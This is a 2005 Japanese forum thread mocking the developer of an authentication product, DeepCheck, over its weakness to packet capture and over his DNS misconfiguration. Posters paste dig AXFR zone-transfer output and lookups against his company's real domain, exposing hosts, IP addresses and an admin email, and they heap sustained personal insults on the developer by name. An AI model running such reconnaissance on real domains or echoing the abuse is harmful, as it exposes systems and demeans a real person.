DeepCheckの根本を把握してるんですね。
>なので、何らかの入力を行って認証するというシーケンスであれば、理論上でなら
>どんな認証方法でもクラックは可能、ということになる。
>あとはどの程度クラックするまで時間がかかるかの勝負。
>DeepCheckはその点脆弱さをよくわかっているね。
>毎回パスワードを変更しないとクラックされるくらい弱いってことがよくわかっているじゃないか。
ここまでは。
>ブルートフォースにもスパイウェアに対しても既存の認証システムより弱いんだから。
ブルートフォースなどと書くからオカシクなるんじゃないかな。
総当たりにつよいもの、弱いものなどありません。
唯一、総当たりの方法が解り易いものである場合、値が近づいたら、パスワードを自動変更するなどできますますが。
>>410 さんの仰る通り、
総当たりは今時使いませんよ。小学生でも。(フォーカス後は違う)
DeepCheck+が、どうやら、今週いっぱいかかりそうなんで、よろしかったら、ある事ないことpostして、時間を潰しといて
もらえると助かります。
正直、DeepCheck+の仕上げに掛かる気力が無いのです。(学術的なアプローチや担保能力を背景にしないとセキュリティ系の
提案は波高しですw)
体験サイト参加者、また、増えました。また、まだ破られていません。
>>410 さんの理論を実行すれば
破れると明言しているのに、誰も、とどめを刺せない。
これは、なにかある、と、思わないヒトは、自信過剰。
はやく破ってくれないと次ぎに進めない。
破る価値もないなどの逃げ口上は、世間に通用しない。
「破る」の定義が違うんだから話にならない
633 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 09:42:58
>>629 やあ、愚か者の浦本。俺は605だ。DeepCheckの根本は全員理解している。クズだ。
お前はDeepCheckの根幹が理解できていないな。
Deepcheckは弱いということが読めなかったか。他の認証と違って唯一
「毎回パス変更を要求しても破られる」ほどに弱いってことが。
学術的アプローチ?あたりまえだ。オカルトに金を払うのは個人の自由だが、客を犠牲にできんからな。
担保能力?あたりまえだ。「DeepCheckが役に立つ」ことを担保できるわけがないだろうけどな。
普通は「このカギをかけたら簡単にはドアが開かない」ことを担保する。
DeepCheckは「このカギをつけるためにドアを半分壊しますけど」といったものだ。
ブルートフォースは基本だ。小学生でもできるほどのな。
お前は本当に無知だなあ。はっはっは。サーバ管理してるならログくらい読めよ。
読めないのか?
パスワードを自動変更なんかして正当ユーザがミスタイプした場合にどうやって対処するんだか。
お前は本当に馬鹿だなあ。はっはっは。ユーザのことなんかこれっぽっちもわからないんだな。
634 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 09:54:51
>>630 >これは、なにかある、と、思わないヒトは、自信過剰。
いや、「すでに破られている」ことが認識できない(目を背けたい?)お前以外は現実が見えてるから。
>破る価値もないなどの逃げ口上は、世間に通用しない。
いや、「すでに破られている」ことが認識できない(目を背けたい?)お前以外は現実が見えてるから。
ってか、使う価値が無いDeepCheckは世間に通用しない。
てか、uraのログイン時のキャプチャデータ出せよ。
635 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 10:02:57
浦本はログが読めません。読めるのはサーブレットが書き出したログくらいのものです。 浦本はネットワークのキャプチャができません。できないからuraのログインもキャプチャできません。 浦本はOSの構造がわかっていません。OSログイン認証がどんなものかさえ。 浦本は認証の基本がわかっていません。認証とは何なのかさえ。 浦本は暗号の基本がわかっていません。暗号を何故使うのかさえ。 浦本はセキュリティの基礎がわかっていません。何から何を守るのかさえ。 浦本はユーザのことを考えていません。誰一人客になってくれないほどに。 浦本は現実がわかっていません。DeepCheckに価値が無いことがわからないほどに。 浦本は社会がわかっていません。DeepCheckが受け入れられると思うほどに。 浦本はすぐ嘘をつきます。発言のほとんどが嘘です。 浦本はすぐ逃げ出します。責任を果たした事がありません。 浦本は約束を破ります。自分から言い出したことも含めて、約束を果たした事がありません。 浦本は・・・・・ 誰にも相手にされないから、このスレから離れられません。
日本ERIとエクソファイヤ 潰れるのはどっちが早い?
>>630 ウラモティさん
>>334 を使って ID: ura で認証成功したときのアドレスバーの内容をそのま
まここに書き込んでください。これならキャプチャデータはいりません。よろ
しくお願いします。
>>629 > 総当たりにつよいもの、弱いものなどありません。
解空間が広くて、探索一回当りのコストが高けりゃ強いだろうが。
>>630 >410 さんの理論を実行すれば 破れると明言している
わざと気が付かない振りをしているのか、まじでわかってないのか微妙なところなんだが、
浦本やー、この文章が間違ってるのがわかるか?
パケットキャプチャできれば理論上解読済みであるとは書いてある
>はやく破ってくれないと次ぎに進めない。
本当に解読して欲しいなら、何をすべきかわかるよな?
# DeepCheck1.1やらDeepCheck+の小手先だけの修正が楽しみでならねぇwww
# どんな修正するか予想するだけで夢がひろがりんぐwww
>>633 -
>>635 さん(同一人物)
いつもいつもありがとう。
>>639 さん
破ってほしいけど、ハウス栽培じゃね。
実践的に破ってもらわないと、だーれも、満足しないんじゃないかな?
DeepCheck+では、最初から、サーバーへのリクエスト内容を公開するから、楽しみにしていてください。
641 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 18:45:18
642 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 18:51:34
>>640 どこが寝言か浦本にもわかるように解説したほうがいいか?
まずひとつ。テスト環境ですら性能を証明できないものを実環境に入れる奴はいねえよ。
ハウス栽培ですらまともに育たない脆弱なものは実環境っていう大自然じゃ即枯れて終了。
ふたつめ。実践的環境になるためには実環境に近くないとムリ。
浦本には実環境に近いものが作れない。なぜならDNSひとつまともに設定できないうえに
何が問題なのか把握できていないだけでなく独り善がり。実践的に生きていない妄想族に
実践など不可能。約束一つ守れていないから「実践的」というのも実現される可能性は
限りなくゼロに近いね。ってかura垢のキャプチャデータ出すつったのはお前だ浦本。
そろそろ現実を見ろよ。50年以上無駄に生きてきたんだからいいかげん目を覚ませ。
>>640 >破ってほしいけど、ハウス栽培じゃね。
要はDeepCheckを解読するんじゃなくて、お前のサーバをクラッキングしてね、ってことだな
上の文章の意味が判らないんだったらもうどうでもいい
サーバのクラッキングをしてほしいんだったら、その旨をWebPageに明記してくれ
お前が望んでいる結果が得られる可能性がある
>実践的に破ってもらわないと、だーれも、満足しないんじゃないかな?
有効な攻撃法が証明されているので「実践的に〜」と言うのは無意味
有効な攻撃法でも解読に数年かかるというのであれば、話はべつだが
DeepCheckはたかだか2回のパケットのキャプチャで解読されてしまう
これでも実践的に破る意味はあるのか?
>DeepCheck+では、最初から、サーバーへのリクエスト内容を公開するから、楽しみにしていてください。
ここで発見された脆弱性(リクエストの内容のキャプチャ)をDeepCheck+で修正したんだね
無償で検証してくれた人にまじで感謝しろよ
浦本。おまえ、このスレで指摘された問題点を解消してリリースするなら、 2ch に「2ch のスレのデータをもとに利益をあげようとしている」ことを通知したうえで 適切な対応を取らないとどうなっても知らんぞ? マーケティングに使うだけでも 2ch のデータを商用に使うには契約が必要だ。 お前、デバッグにこのスレ使ってタダですませようってんじゃねえだろうな? 売れたら払うとか寝ぼけたセリフは吐くなよ。 ここのデータを転用した時点で、対価が必要になっていることを忘れるな。 ここで指摘されたことが一切治っていないなら、契約は不要だろうが、 そんな腐ったままのブツは誰が使うのかな?
ブルートフォースしようとしたら サーバーが落ちるみたいですけど 仕様ですか?
646 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 20:51:01
おい浦本 DeepCheckの利点をひとつも挙げられなかったおまえにもっと簡単な問題を出す。 これが答えられなかったらどうしようもないぞ。 DeepCheckはアプリケーションかプロトコルのどちらだ? まさかこの問題の意味がわからないほどの無能じゃないだろうな?
今更ながらこれってただの無償デバッグだよな。 このスレの存在自体、浦本を喜ばせてるだけだろ。 その代わり、以下の点が確かになったけど。 『DeepCheckはパケットキャプチャされたら破られる糞認証システム』 もうお前ら書き込むのやめてdat落ちさせようぜ。
648 :
名無しさん@お腹いっぱい。 :2005/12/01(木) 21:35:38
DeepCheck+マダァ-? (・∀・ )っ/凵⌒☆チンチン
浦本さん! 「サ ソ」ってのいつになったらなおるんですか!!!!??
浦本さん、いつまで一人でもがいてんの?(笑) いい年したおじさんがジタバタしちゃってさー見てらんねーな。 浦本さんって、ほんと一人で踊ってるよね、ジタバタ踊り(笑)
651 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 00:25:33
浦本さん! 逆引きの設定はいつになったらなおるんですか!!!!??
おい浦本。いい加減、この質問に答えろよ。
それとも答えられないのか?
まぁ、適当に思いつきでDeepCheckなんて作ったんだろうから答えられないだろうねぇ。
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
踊れ〜踊れ〜浦本よ〜♪ 踊れ〜踊れ〜無様なダンスをぉー♪ ♪ 浦 ♪ / \ ムズカシイコトハ シランプリ ヽ(;´Д`)ノ トクイワザハ ヘリクツデス (へ ) ソレシカデキマセヌ フガフガ・・・・ >
浦本、しっかりしなきゃダメだぞ。
655 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 04:10:04
DeepCheck+がバリバリに暗号を使ってたら笑えるな。 今の技術に付いてくなんて浦本の頭では無理だってこと早く気付きなさい。
暗号化といいつつ定数との xor レベルだったら笑う。 OTP が One Time Pad に化けてたらとりあえずびっくりする。
根拠の無い罵詈雑言、ニヤついた声援、今日もご苦労様です。
>>643 さん
前にも明記したんだけど、再度。deepchecker.x-fer.co.jp サーバに限って、サーバ自体のクラックも
株式会社エクスファ代表として公認いたします。(不通はこれで何の効力も無いと思われ。されど、これだけの期間本名でpostしており、
もし、仮に、なりすましとしたら、実在の本人の過失とする。)
>>651 さん
逆引き設定したら、こちらのDNSが起動しなくなった。メール送信できない場合が一部想定されるが、興味ある事例なので、DeepCheck+リリース後、対応します。
>>656 さん ナイスな突っ込み。
---
毎朝、不安な気持ちで、DeepCheckのログを覗く、今日、この頃。
今日も、破られていなかった。
威勢の良い
>>643 さんにでも期待しよう。
で、WebPage って、何処の事を意味してるのか?
話は変わるけど、自己消滅ファイルを製品化しているトコがあるらしいけど、オイラも数年前、シェアウエア販売用として作ったが 販売は止めにした。一部、データ漏洩を防ぐ効果は認めるが、悪い事に使える。(オイラ自身もこの手のメールをもらった事がある 探す段になって検索できない。送った、送らないでスッタモンダしたことがある) この板とは直接関係ないと思う人もいるかも知れないが、実は大有りなのです。 これを倫理的に良しと自覚できれば、別のセキュリティ製品が作れる。(このソースはオープンソース化します。) 活発なご意見を期待します。
659 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 08:08:36
おい浦本。根拠を提示できていないのはお前だけだろ。 それからな浦本。サーバクラックを許可するなら会社のサイトに署名入りで掲示しろ。 つうか「これだけの期間〜実在の本人の過失とする」て、お前やっぱり「認証」が解ってないだろ。 ってか逆引き設定したら「DNSが起動しなくなった」んじゃなくて、お前がミスってんだよ。 まず最初にDNSキッチリ設定しろ。お前は何事に対しても順番がおかしい。 DeepCheckはすでに破られているし、終わっているし、売り物にならないてことはすでに 何度も何度も何度も何度も何度も何度も何度も何度も何度も何度も何度も何度も何度も何度も 証明されてきた。それでもわからないのは浦本一人だけだ。 サルじゃねえんだから、死産した子をいつまでも抱いて歩くな。 DeepCheckは生まれたときには死んでいたんだよ。諦めろ。
660 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 08:09:57
>>658 送った送らないでスッタモンダ?バカかお前は。
サーバのログ見りゃ一発だろうが。
ああ、すまん。浦本はログが読めないんだっけか。
>>657 2chに書いてもみんな不安だろうから、Web上に「サーバクラック許可! 誰の挑戦でも受ける!!」とか書いとけば?
みんな安心してクラックしてくれるかも。
追加、2点。 シェアウエアといえば、だれかが、突っ込んでましたね。「他のシェアウエアはどうしたの?」 1個を除いて完成してます。 しかし、暫く、販売しません。というのも、サポートが大変だから。 一個のシェアウエアで、もう大変。(バグ対応だろう、などの突っ込み無用。) サポート代行していただける所があれば、4個はすぐに販売できます。 もう一点。 50歳以上のハローワーク募集が増えているらしい。 なかなか、見つからないけど。 以上。 では、今日も、元気に、ハローワーク!!
663 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 08:14:56
>>662 ほう。金額次第ではサポート代行してやってもいいぞ。そのかわりきっちり賃金は払えよ。
いくら出せるんだ?サポート要員ってのは専任させる必要があるからな。
相応の対価を用意しろよ。
サーバのクラック許可って、deepchecker-ML参加者のアドレスが漏れても、 浦本さんに責任は問えないってことか? ビバ!ノーガード戦法!!
665 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 08:25:45
なんだ、代行契約するってのはウソか。
>>663 さん
ご存知の通りサポートは大変難しい。やっていただけるのなら、要員候補テストプログラムをお送りさせていただきます。
>>664 さん
ご心配おかけして申し訳ありません。deepchecker-MLの配信サーバは別マシーンで行っております。
万が一の対策も施しているつもりです。
>>665 さん
>代行契約するってのはウソか。 の意味が分かりません。どこかに代行契約って書いてます?
何か別の事とゴチャになってると思われます。
667 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 10:23:54
>>666 まずは条件を明示しろ。
人の募集のやり方もわからんのか?
DNSとメールの関係もわからんのか?
ってか、「サポート代行していただける所があれば、4個はすぐに販売できます。 」と
>>662 に書いてるだろうが。
代行を託すってことは業務委託だ。業務委託なら契約が発生する。
サポートの「代行契約」が必須になることがわからんのか?
お前、何がわかっているんだ?
668 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 10:24:57
ってか、サポートが何かもわかってねえなコイツは。
669 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 10:48:19
ああ、メーリングリストのアドレス漏れのことか。 先にDNSの突っ込みがあったんで誤読したかな。 ま、おなじセグメントにある段階でdeepchecker.x-fer.co.jpがクラックされたら メールアドレスがもれる可能性も高いんだけどな。 セキュリティやってる奴ならすぐ気づきそうなもんだが。 てか、deepchecker.x-fer.co.jpがアンリーチャブルなのはどうしたもんかね。
670 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 10:53:50
これが浦本式セキュリティか。 dig deepchecker.x-fer.co.jp (中略) ;; QUESTION SECTION: ;deepchecker.x-fer.co.jp. IN A (後略) Aレコードにアドレス書いてなかったら外部からアタックされる心配は少ないってか。
671 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 11:06:14
まちがいた。QUESTION SECTION書いても意味がねえや。 ってか応答にdeepchecker.x-fer.co.jpが無かったからやっぱりAレコ無ぇのか? 要するにこういうことだ。 host deepchecker.x-fer.co.jp Host deepchecker.x-fer.co.jp not found: 3(NXDOMAIN) これでもわかりやすいかな ping deepchecker.x-fer.co.jp ping: unknown host deepchecker.x-fer.co.jp
672 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 11:19:36
>>657 ああ、やっとわかった。
「前にも明記したんだけど、再度。deepchecker.x-fer.co.jp サーバに限って、サーバ自体のクラックも
株式会社エクスファ代表として公認いたします。」
がウソなんだな。
dig @ns.x-fer.co.jp x-fer.co.jp AXFR
; <<>> DiG 9.2.4 <<>> @ns.x-fer.co.jp x-fer.co.jp AXFR
;; global options: printcmd
x-fer.co.jp. 86400 IN SOA ns.x-fer.co.jp. katuhisa_.mac.co
m. 2005113007 10800 3600 604800 3600
x-fer.co.jp. 86400 IN MX 10 mini142.x-fer.co.jp.
x-fer.co.jp. 86400 IN NS ns.x-fer.co.jp.
(中略)
x-fer.co.jp. 86400 IN A 125.100.44.163
deepcheck.x-fer.co.jp. 86400 IN CNAME pbg3x500.x-fer.co.jp. ←ここ注目
ftp.x-fer.co.jp. 86400 IN CNAME mini142.x-fer.co.jp.
mail.x-fer.co.jp. 86400 IN CNAME mini142.x-fer.co.jp.
(中略)
pbg3x500.x-fer.co.jp. 86400 IN A 125.100.44.165
ふーん、自社のサーバ名も、それもクラックさせようというサーバ名もちゃんと指定できないんだね。
存在しないサーバをクラックさせようとして「誰もクラックできないから俺の勝ち」とでも言おうと思った?
全く、浦本ってのは本当にクズだなあ。少しは社会のルールに従ったらどうだい?
>>657 > 逆引き設定したら、こちらのDNSが起動しなくなった。
これなんて煙幕?
674 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 12:07:46
>>286 >
>>284 極貧のため逆引き契約中止した。
>>657 > 逆引き設定したら、こちらのDNSが起動しなくなった。
どっちが本当の理由だ?
ご免。 deepchecker ではなく、deepcheck.x-fer.co.jp だった。 申し訳ない。
677 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 15:52:20
DeepCheck+マダァ-? (・∀・ )っ/凵⌒☆チンチン
678 :
名無しさん@お腹いっぱい。 :2005/12/02(金) 23:52:12
浦本さんってもしかしてで頭狂ってるの? なんか、いちおう質問に応えた形を取ってることもあるけど、それがほとんどが的外れor幼稚な間違いなんだけど? 頭が狂ってるか、それとも単なるバカなのかハッキリしてほしい。前者なら俺達が何か協力できることもあると思う。 ぜひ教えてくれ。
(
>>612 参照)
> 永遠のDNS挑戦者
まさしくキャッチコピーにふさわしい。
浦本さんじゃ一生かかっても正しいDNSの設定ができないんじゃないのかな?
>>678 さん
チカジか「間違いだらけの間違い指摘」なるドキュメントを作ろうと思っています。
これも的外れでしょうか?
>>679 さん
そこまでおっしゃるなら壷を押さえたNAMEDの設定方法を例示してくれますよね。
ライブ中継させていただきます。
Jabber サーバたってますから、あなたもライブに音声だけでも参加して、私の間違いとやらをご叱責ください。
なかなかやる気の起きる仕事に出会えない。ながらも、2社。
偶然だけど、ご近所さんで、ひとつはシステム開発業。なじみの仕事だ。
もうひとつは、昔で言うサポート。ただ、視点、スタンスがユニークで、非常に興味を持っている。
来週いっぱいには何らかの報告が出来るかもしれません。
どちらか一方でも決まると、DeepCheck 展開を腰を据えてジミジミやれるのだけれど、どうなりますか?
681 :
名無しさん@お腹いっぱい。 :2005/12/03(土) 09:01:06
>>680 よお、約束を守らず嘘ばかりの言い訳に終始して逃げ回っているクズ。
お前がまず最初に出すべきなのは謝罪文だろうが。
次に引退宣言だろう?
間違っているのはお前だけだ。浦本勝久ただ一人だけが間違っている。
つか、Namedの設定をコンサルティングして欲しければ金を出せ。
貴様は人に物を頼むときの態度すらなっていない。
幼稚園で習わなかったか?ん?ママは教えてくれなかったか?
幼稚園児以下か。そうかそうか。子供に還るのは還暦過ぎてボケてからにしてくれ。
もうボケてるんなら病院いっとけ。それ以上ボケなくて済むかもしれないぞ。
仕事がもらえたら仕事しろ。お前に仕事を選ぶ余裕があるのか?
どんなおこぼれ仕事でももらえたら全力でやれ。
仕事が決まったら趣味に没頭できるだと?ふざけるな。
仕事を選んだ結果がDeepCheckみたいなクソの役にすら立たん代物じゃなかったか?
お前は何もかも間違っているかズレているか逃げているかの三択なんだな。
>>679 AppleのGUI経由での設定の仕方は知らんなw
そもそもそういうインタフェース経由でどうすればSOAレコード真っ白とか
奇特な設定ができるのか理解できん。
Appleの設定GUIってそんなにアホなのか?
>>680 ハローワークってことは社員になるってことだよね?仕事の契約するわけではないよね?
ってことは先方にはきちんと、自分が会社を経営しているということは伝えてあるのかな?
大抵の会社には副業禁止の規定があるから、会社経営している人なんてとらないだろうし
副業禁止してなくても、同業種の会社の経営者を社員として雇う会社はすくないんじゃないかな?
あ。社員になって、deepcheck は破棄するってことですね!!!!
684 :
名無しさん@お腹いっぱい。 :2005/12/03(土) 12:06:08
>>682 > Appleの設定GUIってそんなにアホなのか?
ユーザがアホなだけでは?
44.100.125.in-addr.arpa. 86400 IN SOA ns.44.100.125.in-addr.arpa. katuhisa_.mac.com. 2005113000 10800 3600 604800 3600
125.100.44.0/24 全部を持ってるわけでもないのに、勝手にこんな SOA レ
コード用意してる時点で理解が足りてないのは自明。
ns.44.100.125.in-addr.arpa. なんて勝手に作るなよ。
どうしてもやりたければ USEN に許可もらってからやれよ!(w
>>680 >そこまでおっしゃるなら壷を押さえたNAMEDの設定方法を例示してくれますよね。
設定を晒すのはまずお前だろ、間違ってるんだから(笑)
おまいさ、世の中のDNS管理者が普通にやってることが自分にはできないってことがどういうことか分かってるか?
だから本でも読んで勉強しろって。
なんでオマイはそう偉そうなんだ?教えてほしいなら敬語使えよ。
お前ら、本当は浦本の事は好きなんだろ。 表面上は罵りながら、実は糞認証システムのデバッグやDNSの設定に協力してやってる。
>>686 あたりまえだろ、俺達はウラモティチルドレンだ。
ウラモティにまともな大人になってほしいと思って叱咤激励してるんだよ。すべてはウラモティのためにな、少しは感謝してほしいと思う。
まぁなんというか。 うちの親父がこんな電波でなくてよかったと思ってる。
しかし、あきれ返るほど低レベルなじじいだな。 こんなんが経営してる会社が存続しているのが、かなり不思議なんだが...
浦本さん! その調子で悪い奴らをやっつけてください!
DNSの設定もできない? ( ´,_ゝ`)プッ( ´,_ゝ`)プッ( ´,_ゝ`)プッ
あ、そうだ、ウラモティ自分で売ってるじゃん。 確か"うれし泣きDNS"って言ってたなぁ。 今こそ"うれし泣きDNS"の出番じゃないか? 早く使ってみてよ、ウラモティの泣く姿が目に浮かぶよ。 ( ´,_ゝ`)プッ( ´,_ゝ`)プッ( ´,_ゝ`)プッ
ゴガギーン ドッカン m ドッカン =====) )) ☆ ∧_∧ | | / / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ( )| |_____ ∧_∧ < おらっ!出てこい 「 ⌒ ̄ | | || (´Д` ) \___________ | /  ̄ | |/ 「 \ | | | | || || /\\ | | | | | へ//| | | | | | | ロ|ロ |/,へ \| | | | | ∧ | | | |/ \ / ( ) | | | |〈 | | | | / / / / | / | 〈| | | / / / / | | || | | / / / / =-----=-------- | |
浦本先生に質問です。 DeepCheckはいつごろ商品化される計画で、 一年でどのくらいの利益が出ると考えていますか? 漠然としたイメージで結構ですので教えてください。
>>685 > 設定を晒すのはまずお前だろ、間違ってるんだから(笑)
最初から全世界へのゾーン転送を許可してくれてるよ!!
named.conf は見えないけどゾーン設定だったら丸見えだよ!!
浦本さん、まず今やることは迷惑をかけたMLへの謝罪だと思います。 筋を通してください。 ふざけるのはそれからです。
697 :
名無しさん@お腹いっぱい。 :2005/12/04(日) 01:12:22
DeepCheck+マダァ-? (・∀・ )っ/凵⌒☆チンチン
698 :
名無しさん@お腹いっぱい。 :2005/12/04(日) 05:22:12
DeepCheck+マダァ-? (・∀・ )っ/凵⌒☆チンチン
>>681 さん、即刻、病院行き。
>>682 さん、
http://www.x-fer.co.jp/dig.pdf にSOAレコード真っ白出ない事が明示されています。
>>683 さん、いろいろご想像ありがと。会社やってる事、まんま、言ってるよ、何処にでも。最初におくる履歴には書いてないけど、
面接のお伸びが掛かった時にね。(いまんとこ、問題ない)
あ、会社止めないよ、今んとこ。シェアウエアなどのお客さんもいるし、DeepCheckで商談中のとこもあるし。
まして、DeepCheck、破られていないんだから、止める理由が無い。
>>684 さん。情報ねつ造は告訴されちゃうよ。
>44.100.125.in-addr.arpa. 86400 IN SOA ns.44.100.125.in-addr.arpa. katuhisa_.mac.com. 2005113000 10800 3600 604800 3600
こんなの、どうやって入手したの?出典明示。
>>685 さん オイラのどこが偉そうなのか、オイラに解るように説明してほしい。
>>686 ,687 さん。少し何処ではなく、大変感謝してる。一個人としては、ムカついてるけどね。
>>693 さん、アスキー絵は面白いけど、書いてるイメージ、変えようよ。こんなシーンを何度も
みせられると、人間、慣れていくらしいよ。(深層トレーニング)
>>694 さん。それはね、企業秘密。
>>695 さん、さらして結構ですから、ゾーン設定だったら丸見えだよ!!の丸見え内容、転写してくれませんか。
でもさ、かりにみえたとしても、そんで、どーだっちゅーの?下らん、揚げ足取り!
>>696 さん、ふざけてるのは私ではありません。
>>697 ,698 さん、わりー、まだだ〜〜〜〜。
丹念にレスすると、ものすごー、しょうもうしまーっつ。
>>699 SOAレコードが真っ白だった時期はあるよ。
ずいぶん時間をかけて直したみたいだったけど。
702 :
名無しさん@お腹いっぱい。 :2005/12/04(日) 09:54:51
この程度で「丹念なレス」という浦本の低脳っぷり。 あと、証拠捏造は告訴されるんだろ? >シェアウエアなどのお客さんもいるし、DeepCheckで商談中のとこもあるし。 捏造すんなよ(笑 あ、妄想? 早く病院いけよ。 つうか浦本。 ふざけてんのはお前の脳だけだ。 いいかげん真面目に対応しろ。無能のくせに手を抜くんじゃない。
>>701 さん
なるほど。今の事じゃないのなら、そういう期間が1ヵ月ほど続いたと思います。
急な移転でISPさんへの申請など遅れ、暫定的に、小回りの効く IPS さんを x-fer.co.jp ドメインに充てたのですが、
こちらが、1個のG-IPで、その設定がうまく行かなかったのです。もしかしたら、使ったルータの設定が拙かったかもしれません。
一区切りついたら、原因を解明しようと思います。
NAMED の設定は、もう何年もやってまして、また、MacOS-X Server は、ご存知だと思いますが、
独自GUIで、NAMEDドキュメントに書込んでくれますが、ゾーン転送だけは、手書きしなければなりません。
705 :
名無しさん@お腹いっぱい。 :2005/12/04(日) 12:22:53
>>701 >丹念にレスすると、ものすごー、しょうもうしまーっつ。
どこが丹念にレスしてんだ?都合の良い応えができるとこだけ適当にレスしてるだけだろ?
例えば、
>>685 の「設定を晒すのはまずお前だろ、間違ってるんだから(笑) 」とか応えてねーじゃねーか。
>>691 の「DNSの設定もできない?」
>>696 の「浦本さん、まず今やることは迷惑をかけたMLへの謝罪だと思います。 」
あと
>>705 氏の言うように
>>430 などにもレスをするべきだ。
アスキーアートなんかにレスする暇があったらオマイが今まで逃げてきた質問にちゃんとこたえろ。
ゴガギーン
ドッカン
m ドッカン
=====) )) ☆
∧_∧ | | / / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
( )| |_____ ∧_∧ < おらっ!出てこい
「 ⌒ ̄ | | || (´Д` ) \___________
| /  ̄ | |/ 「 \
| | | | || || /\\
| | | | | へ//| | | |
| | | ロ|ロ |/,へ \| | | |
| ∧ | | | |/ \ / ( )
| | | |〈 | | | |
/ / / / | / | 〈| | |
/ / / / | | || | |
/ / / / =-----=-------- | |
<判定>ただいまのウラモティ
質問にちゃんと応えない所から、
>・Mr しらんぷり
>・400戦棄権の男
>・浦本メソッドの伝道師
が該当します。
また、DNSの設定がまともにできていない所から、
>・永遠のDNS挑戦者
が該当します。
以上です。
----------
>>612 >>626 参照
浦本のおじさん、俺今までいろいろ手厳しいこを言ってきた けど(ちなみにこれからも言うけど…)、ここで一言マジレス をしておくよ。 DeepCheck(+含む)でビジネスは無理だよ。ホント無理。 こう言ってもどうせ聞き入れてくれないんだろうけどね…。 俺はある程度大きい企業に勤めてるけど、入社してから いろいろと学んだことや分かったことがあるんだ。 浦本おじさんは俺の新人のころに似てるんだ、技術指向 でいろいろやってみたいとか、先輩はいろいろ言ってくる けどまったく新しい技術とかって俺みたいな突飛な発想 じゃないと思いつかないんだ!とかね。 その頃の俺は何の裏付けもない自信と妄想で突き進んで 周りを突っぱねていつも技術的な記事ばかり見てふむ ふむ…と悦に入ってたんだ。 でも数年経った今は違うんだ、社会というか企業全体を 考えて判断していかなければならないこと、論理的思考 の大切さ、他人を説得できるほどの裏付けの大切さ、 記事じゃなく実際にできるかどうかの大切さ、俺は学んだんだ。 業務でセキュリティのこともちょっとかじったからDeepCheck じゃだめだということも分かるんだ。作成側がなんと言って も実際使ってもらえないんだよ…危険すぎるんだよ…。 DeepCheckを将来の糧と考えているならすぐさま考えを改める べきだよ。これからの人生をどうするの。 マジレス終わり。
>>708 どこを縦に読むのか悩んでしまった、汚れてしまった自分が悲しい。
このスレをみてるとたまにこうやってまじめに心配してくれる人が現れる。
だけど無駄なのよね。残念だけど。
710 :
名無しさん@お腹いっぱい。 :2005/12/04(日) 17:30:12
>>699 >
>>684 さん。情報ねつ造は告訴されちゃうよ。
> >44.100.125.in-addr.arpa. 86400 IN SOA ns.44.100.125.in-addr.arpa. katuhisa_.mac.com. 2005113000 10800 3600 604800 3600
> こんなの、どうやって入手したの?出典明示。
とりあえず
>>342 を見ようね。
まさかdigも知らないのか?
知らないだろうね。nslookupも知らないだろう。 ソフトウエア技術者なら知っているだろうという前提、これがウラモティにはあてはまらない。 ウラモティは、プロトコルレベル〜アプリケーションレベルの導通確認を全部、PINGなんて言う人だからな。 基礎が理解できていないのです。
713 :
名無しさん@お腹いっぱい。 :2005/12/04(日) 20:17:09
なんだ、また浦本は逃げたのか。 一度くらい技術的な質問に的確に答えてみろよ。できるならなぁ!
>>712 nslookup は以前書き込みしてた希ガス
まー、どちらにせよマクの GUI 設定なんだけど。
浦本さんに質問! 浦本さんは、DNSの設定をした後、どういうツールを使って、どのように動作確認をしてるの?
浦本、早くこの質問に答えてよ。
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
ウラモティってなんで納期を守らないの? しかも自分が設定した納期だよ。 いったい何回延期してんだよ。 社会人失格だね。 アルバイト先が決まったって、アンタ時間どおりに来ないんじゃないの? ちゃらちゃらした高校生だって時間くらいは守るぞ。
自分がこなせる仕事量が未だに分からないんじゃない? MS Projectとか使って管理してみたら?
MacでDNS設定すら満足に出来ないヘナチョコジジイがMS Project使えるとは思えん。
>あ、会社止めないよ、今んとこ。シェアウエアなどのお客さんもいるし、DeepCheckで商談中のとこもあるし。 >まして、DeepCheck、破られていないんだから、止める理由が無い。 >まして、DeepCheck、破られていないんだから、止める理由が無い。 >まして、DeepCheck、破られていないんだから、止める理由が無い。 >まして、DeepCheck、破られていないんだから、止める理由が無い。 >まして、DeepCheck、破られていないんだから、止める理由が無い。 スゴスw
>
>>699 > >
>>684 さん。情報ねつ造は告訴されちゃうよ。
> > >44.100.125.in-addr.arpa. 86400 IN SOA ns.44.100.125.in-addr.arpa. katuhisa_.mac.com. 2005113000 10800 3600 604800 3600
> > こんなの、どうやって入手したの?出典明示。
> とりあえず
>>342 を見ようね。
>>710 ではないが、浦本さん、これにはきっちり答えてくださいね。
